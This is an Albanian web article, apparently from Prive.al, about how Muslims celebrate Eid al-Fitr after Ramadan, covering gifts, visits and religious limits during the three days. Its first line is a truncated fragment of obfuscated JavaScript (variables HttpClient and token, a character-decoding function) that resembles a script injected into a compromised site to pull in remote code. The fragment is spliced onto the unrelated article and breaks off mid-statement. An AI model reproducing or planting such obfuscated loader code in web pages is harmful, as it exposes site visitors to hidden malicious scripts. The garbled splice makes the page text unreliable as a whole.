;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pse festohet Fitër Bajrami?

By

Fitër Bajrami është ditë feste për myslimanët pas një muaji agjërim gjatë Ramazanit.

Festohet sikur çdo lloj feste tjetër; rroba të reja, gratë mbulohen me bizhuteri, njerëzit mblidhen festojnë e hanë ushqim të mirë e lumturia rrezaton gjithandej. Fëmijëve u bëhen dhurata dhe vizitojnë kushërinjtë.

Sipas Kuranit, besimtarët shpërblehen me tri ditë të relaksohen dhe të kënaqen me njerëzit më të dashur afër. Gjithsesi edhe këtu ka një limit:

  1. Lutjet nuk duhet ndalur.
  2. Recitimi i Kuranit nuk duhet ndalur.
  3. Duhet të kujdeseni që ushqimi që hani është hallall.

Agjërimi në këtë ditë është mëkat, sepse sipas fesë Islame “Shejtani” agjëron në këtë ditë.

Gjithashtu kjo festë më së miri pasqyron lidhjen e besimtarëve duke forcuar familjet dhe shoqëritë, dhe po ashtu dëshmon që Islami nuk është fe diktatoriale sepse lejon besimtarët e saj të festojnë të lumtur. /Prive.al

 

 

Artikuj të ngjashëm